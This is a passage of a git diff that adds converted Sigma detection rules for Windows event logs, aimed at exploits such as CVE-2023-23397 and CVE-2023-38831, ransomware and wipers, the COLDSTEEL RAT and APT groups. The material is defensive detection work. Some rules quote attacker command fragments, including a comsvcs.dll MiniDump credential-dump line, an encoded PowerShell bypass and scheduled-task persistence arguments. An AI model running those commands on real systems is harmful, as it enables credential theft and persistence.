dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. + The command runs in a child process under the 7zFM.exe process. +references: + - https://github.com/kagancapar/CVE-2022-29072 + - https://twitter.com/kagancapar/status/1515219358234161153 +author: frack113 +date: 2022/04/17 +modified: 2023/02/07 +tags: + - attack.execution + - cve.2022.29072 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + selection_parent: + ParentProcessName|endswith: \7zFM.exe + filter_bat: + CommandLine|contains: + - ' /c ' + - ' /k ' + - ' /r ' + filter_null: + CommandLine: + condition: process_creation and (all of selection_* and not 1 of filter_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml new file mode 100644 index 000000000..fc80fe972 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml @@ -0,0 +1,44 @@ +title: Suspicious Sysmon as Execution Parent +id: 6d1058a4-407e-4f3a-a144-1968c11dc5c3 +status: experimental +description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) +references: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120 + - https://twitter.com/filip_dragovic/status/1590052248260055041 + - https://twitter.com/filip_dragovic/status/1590104354727436290 +author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault) +date: 2022/11/10 +modified: 2023/10/23 +tags: + - attack.privilege_escalation + - attack.t1068 + - cve.2022.41120 + - detection.emerging_threats +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|endswith: + - \Sysmon.exe + - \Sysmon64.exe + filter_main_generic: + NewProcessName|contains: + - :\Windows\Sysmon.exe + - :\Windows\Sysmon64.exe + - :\Windows\System32\conhost.exe + - :\Windows\System32\WerFault.exe # When Sysmon crashes + - :\Windows\System32\WerFaultSecure.exe # When Sysmon crashes + - :\Windows\System32\wevtutil.exe + - :\Windows\SysWOW64\wevtutil.exe + - \AppData\Local\Temp\Sysmon.exe # When launching Sysmon 32bit version. + filter_main_null: + NewProcessName: + condition: process_creation and (selection and not 1 of filter_main_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml new file mode 100644 index 000000000..d463111cc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml @@ -0,0 +1,35 @@ +title: BlueSky Ransomware Artefacts +id: eee8311f-a752-44f0-bf2f-6b007db16300 +status: experimental +description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt. +references: + - https://unit42.paloaltonetworks.com/bluesky-ransomware/ +author: j4son +date: 2023/05/23 +tags: + - attack.impact + - attack.t1486 + - detection.emerging_threats +logsource: + product: windows + service: security +detection: + security: + Channel: Security + selection_access_eid: + EventID: + - 4663 + - 4656 + selection_access_data: + - ObjectName|endswith: .bluesky + - ObjectName|contains: DECRYPT FILES BLUESKY + selection_share_eid: + EventID: 5145 + selection_share_data: + - RelativeTargetName|endswith: .bluesky + - RelativeTargetName|contains: DECRYPT FILES BLUESKY + condition: security and (all of selection_access_* or all of selection_share_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml new file mode 100644 index 000000000..4bff8d5dd --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml @@ -0,0 +1,36 @@ +title: Hermetic Wiper TG Process Patterns +id: 2f974656-6d83-4059-bbdf-68ac5403422f +status: test +description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 +references: + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia +author: Florian Roth (Nextron Systems) +date: 2022/02/25 +modified: 2022/09/09 +tags: + - attack.execution + - attack.lateral_movement + - attack.t1021.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + NewProcessName|endswith: \policydefinitions\postgresql.exe + selection2: + - CommandLine|contains: + - CSIDL_SYSTEM_DRIVE\temp\sys.tmp + - ' 1> \\\\127.0.0.1\ADMIN$\__16' + - CommandLine|contains|all: + - 'powershell -c ' + - '\comsvcs.dll MiniDump ' + - \winupd.log full + condition: process_creation and (1 of selection*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml new file mode 100644 index 000000000..232ecd0ce --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml @@ -0,0 +1,29 @@ +title: Potential Raspberry Robin Dot Ending File +id: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a +status: test +description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin +author: Nasreddine Bencherchali (Nextron Systems) +references: + - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ +date: 2022/10/28 +modified: 2023/02/05 +tags: + - attack.execution + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + # Example 1: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-3f-raspberryrobin-runonce.png + # Example 2: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-5f-odbcconf.png + # Example 3: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-6f-fauppod-command-line.png + CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} # cannot match on end-of-line because of FPs with bind DNS notation + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml new file mode 100644 index 000000000..acaf0e817 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml @@ -0,0 +1,28 @@ +title: MSSQL Extended Stored Procedure Backdoor Maggie +id: 711ab2fe-c9ba-4746-8840-5228a58c3cb8 +status: test +description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server +references: + - https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01 +author: Denis Szadkowski, DIRT / DCSO CyTec +date: 2022/10/09 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1546 + - detection.emerging_threats +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection: + Provider_Name: MSSQLSERVER + EventID: 8128 + Message|contains: maggie + condition: application and selection +falsepositives: + - Legitimate extended stored procedures named maggie +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml new file mode 100644 index 000000000..6057c3acd --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml @@ -0,0 +1,32 @@ +title: Potential ACTINIUM Persistence Activity +id: e1118a8f-82f5-44b3-bb6b-8a284e5df602 +status: test +description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. +references: + - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations +author: Andreas Hunkeler (@Karneades) +date: 2022/02/07 +modified: 2023/03/18 +tags: + - attack.persistence + - attack.t1053 + - attack.t1053.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - schtasks + - create + - wscript + - ' /e:vbscript' + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml new file mode 100644 index 000000000..5c0b098dc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml @@ -0,0 +1,30 @@ +title: MERCURY APT Activity +id: a62298a3-1fe0-422f-9a68-ffbcbc5a123d +status: experimental +description: Detects suspicious command line patterns seen being used by MERCURY APT +references: + - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ +author: Florian Roth (Nextron Systems) +date: 2022/08/26 +modified: 2023/03/10 +tags: + - attack.execution + - attack.t1059.001 + - attack.g0069 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_base: + CommandLine|contains|all: + - -exec bypass -w 1 -enc + - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA # Start-Job -ScriptBlock + condition: process_creation and (all of selection*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml new file mode 100644 index 000000000..32d19b72f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml @@ -0,0 +1,47 @@ +title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) +id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db +related: + - id: f8987c03-4290-4c96-870f-55e75ee377f4 + type: similar +status: experimental +description: | + Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. +references: + - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html + - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment + - https://github.com/ForceFledgling/CVE-2023-22518 +author: Andreas Braathen (mnemonic.io) +date: 2023/11/14 +tags: + - detection.emerging_threats + - attack.execution + - attack.t1059 + - attack.initial_access + - attack.t1190 + - cve.2023.22518 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent: + ParentCommandLine|contains: confluence + ParentProcessName|endswith: + - \tomcat8.exe + - \tomcat9.exe + - \tomcat10.exe + selection_child: + # Note: Only children associated with known campaigns + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml new file mode 100644 index 000000000..ce540193e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml @@ -0,0 +1,33 @@ +title: Outlook Task/Note Reminder Received +id: fc06e655-d98c-412f-ac76-05c2698b1cb2 +status: experimental +description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. +references: + - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/04/05 +modified: 2023/08/17 +tags: + - attack.persistence + - attack.t1137 + - cve.2023.23397 + - detection.emerging_threats +logsource: + category: registry_set + product: windows +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|contains|all: + - \SOFTWARE\Microsoft\Office\ + - \Outlook\ + ObjectName|contains: + - \Tasks\ + - \Notes\ + condition: registry_set and selection +falsepositives: + - Legitimate reminders received for a task or a note will also trigger this rule. +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml new file mode 100644 index 000000000..f8939caee --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml @@ -0,0 +1,39 @@ +title: CVE-2023-23397 Exploitation Attempt +id: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c +status: experimental +description: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation. +author: Robert Lee @quantum_cookie +date: 2023/03/16 +modified: 2023/03/22 +references: + - https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/ +tags: + - attack.credential_access + - attack.initial_access + - cve.2023.23397 + - detection.emerging_threats +logsource: + service: security + product: windows + definition: 'Requirements: SACLs must be enabled for "Query Value" on the registry keys used in this rule' +detection: + security: + Channel: Security + selection: + EventID: + - 4656 + - 4663 + ProcessName|endswith: \OUTLOOK.EXE + # Example: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet001\Services\WebClient\NetworkProvider + ObjectName|contains|all: + - \REGISTRY\MACHINE\SYSTEM + - Services\ + ObjectName|endswith: + - WebClient\NetworkProvider + - LanmanWorkstation\NetworkProvider + AccessList|contains: '%%4416' # "Query key value" + condition: security and selection +falsepositives: + - Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml new file mode 100644 index 000000000..a6a65c13c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml @@ -0,0 +1,53 @@ +title: Potential CVE-2023-23397 Exploitation Attempt - SMB +id: de96b824-02b0-4241-9356-7e9b47f04bac +status: experimental +description: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397. +references: + - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/04/05 +tags: + - attack.exfiltration + - cve.2023.23397 + - detection.emerging_threats +logsource: + product: windows + service: smbclient-connectivity +detection: + smbclient_connectivity: + Channel: Microsoft-Windows-SmbClient/Connectivity + selection: + # Author Note: You could adapt this rule to use the "ServerName" field and uncomment the commented EventIDs. But you need to provide your own filter for "trusted server names" + EventID: + # - 30800 # The server name cannot be resolved. (Doesn't contain the "ServerAddress" field) + - 30803 # Failed to establish a network connection. + - 30804 # A network connection was disconnected. + - 30806 # The client re-established its session to the server. + # - 31001 # Error (Doesn't contain the "ServerAddress" field) + filter_main_local_ips: + ServerAddress|startswith: + - '10.' # 10.0.0.0/8 + - 192.168. # 192.168.0.0/16 + - 172.16. # 172.16.0.0/12 + - 172.17. + - 172.18. + - 172.19. + - 172.20. + - 172.21. + - 172.22. + - 172.23. + - 172.24. + - 172.25. + - 172.26. + - 172.27. + - 172.28. + - 172.29. + - 172.30. + - 172.31. + - '127.' # 127.0.0.0/8 + - 169.254. # 169.254.0.0/16 + condition: smbclient_connectivity and (selection and not 1 of filter_main_*) +falsepositives: + - Some false positives may occur from external trusted servers. Apply additional filters accordingly +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml new file mode 100644 index 000000000..5fcb96159 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml @@ -0,0 +1,32 @@ +title: Potential CVE-2023-36884 Exploitation - Share Access +id: 3df95076-9e78-4e63-accb-16699c3b74f8 +status: experimental +description: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884 +references: + - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/07/13 +tags: + - attack.command_and_control + - cve.2023.36884 + - detection.emerging_threats +logsource: + product: windows + service: security + definition: The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure +detection: + security: + Channel: Security + selection_eid: + EventID: 5140 + selection_share_name: + ShareName|contains: \MSHTML_C7\ + ShareName|re: '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' + selection_share_path: + ShareLocalPath|contains: \MSHTML_C7\ + ShareLocalPath|re: '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' + condition: security and (selection_eid and 1 of selection_share_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml new file mode 100644 index 000000000..fed5935a0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml @@ -0,0 +1,46 @@ +title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process +id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 +related: + - id: e4556676-fc5c-4e95-8c39-5ef27791541f + type: similar +status: experimental +description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. +references: + - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ + - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md +author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io) +date: 2023/08/30 +tags: + - detection.emerging_threats + - attack.execution + - attack.t1203 + - cve.2023.38331 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent: + ParentProcessName|endswith: \WinRAR.exe + selection_folder: + CommandLine|contains: \AppData\Local\Temp\Rar$ + selection_double_ext: + CommandLine|re: \.[a-zA-Z0-9]{1,4} \. + selection_binaries: + # Note: add additional binaries that the attacker might use + - NewProcessName|endswith: + - \cmd.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - PowerShell.EXE + - pwsh.dll + - wscript.exe + condition: process_creation and (all of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml new file mode 100644 index 000000000..d0076ebdc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml @@ -0,0 +1,37 @@ +title: CVE-2023-40477 Potential Exploitation - WinRAR Application Crash +id: e5a29b54-6fe7-4258-8a23-82960e31231a +status: experimental +description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477 +references: + - https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/ + - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC + - https://www.rarlab.com/vuln_rev3_names.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/08/31 +tags: + - attack.execution + - cve.2023.40477 + - detection.emerging_threats +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection: + Provider_Name: Application Error + EventID: 1000 + AppName: WinRAR.exe + filter_main_fixed_version: + # TODO: fix this when the "lt" modifier is implemented for software versions + AppVersion|startswith: + - 6.23. + - 6.24. + - 6.25. + - 6.26. + - '7.' + condition: application and (selection and not 1 of filter_main_*) +falsepositives: + - Legitimate crash for reasons other than exploitation of the vulnerability +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml new file mode 100644 index 000000000..16ef41993 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml @@ -0,0 +1,26 @@ +title: MSMQ Corrupted Packet Encountered +id: ae94b10d-fee9-4767-82bb-439b309d5a27 +status: experimental +description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation +references: + - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/04/21 +tags: + - attack.execution + - detection.emerging_threats +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection: + Provider_Name: MSMQ + EventID: 2027 + Level: 2 + condition: application and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml new file mode 100644 index 000000000..e9e6fcf11 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml @@ -0,0 +1,29 @@ +title: COLDSTEEL RAT Anonymous User Process Execution +id: e01b6eb5-1eb4-4465-a165-85d40d874add +status: experimental +description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/04/30 +tags: + - attack.persistence + - attack.defense_evasion + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + ParentProcessName|contains: + - \Windows\System32\ + - \AppData\ + SubjectUserName|contains: ANONYMOUS + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml new file mode 100644 index 000000000..b5c42591e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml @@ -0,0 +1,30 @@ +title: COLDSTEEL RAT Service Persistence Execution +id: 9f9cd389-cea0-4142-bf1a-a3fd424abedd +status: experimental +description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf +author: X__Junior (Nextron Systems) +date: 2023/04/30 +tags: + - attack.persistence + - attack.defense_evasion + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|endswith: + - ' -k msupdate' + - ' -k msupdate2' + - ' -k alg' + NewProcessName|endswith: \svchost.exe + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml new file mode 100644 index 000000000..621561baf --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml @@ -0,0 +1,31 @@ +title: Potential COLDSTEEL RAT Windows User Creation +id: 95214813-4c7a-4a50-921b-ee5c538e1d16 +status: experimental +description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/02 +modified: 2023/08/17 +tags: + - attack.persistence + - detection.emerging_threats +logsource: + category: registry_set + product: windows +detection: + registry_set: + EventID: 4657 + Channel: Security + selection: + ObjectName|contains|all: + - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21- + - \ProfileImagePath + NewValue|contains: + - ANONYMOUS + - _DomainUser_ + condition: registry_set and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml new file mode 100644 index 000000000..a1e270191 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml @@ -0,0 +1,31 @@ +title: COLDSTEEL Persistence Service Creation +id: 3ced239c-7285-4b54-99c4-8525b69293f7 +status: test +description: Detects the creation of new services potentially related to COLDSTEEL RAT +references: + - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/05/02 +tags: + - attack.defense_evasion + - attack.persistence + - detection.emerging_threats +logsource: + product: windows + service: system +detection: + system: + Channel: System + selection: + Provider_Name: Service Control Manager + EventID: 7045 + ServiceName: + - Name + - msupdate + - msupdate2 + ImagePath|contains: \Windows\System32\svchost.exe + condition: system and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml new file mode 100644 index 000000000..befa6a640 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml @@ -0,0 +1,41 @@ +title: DarkGate - Autoit3.EXE Execution Parameters +id: 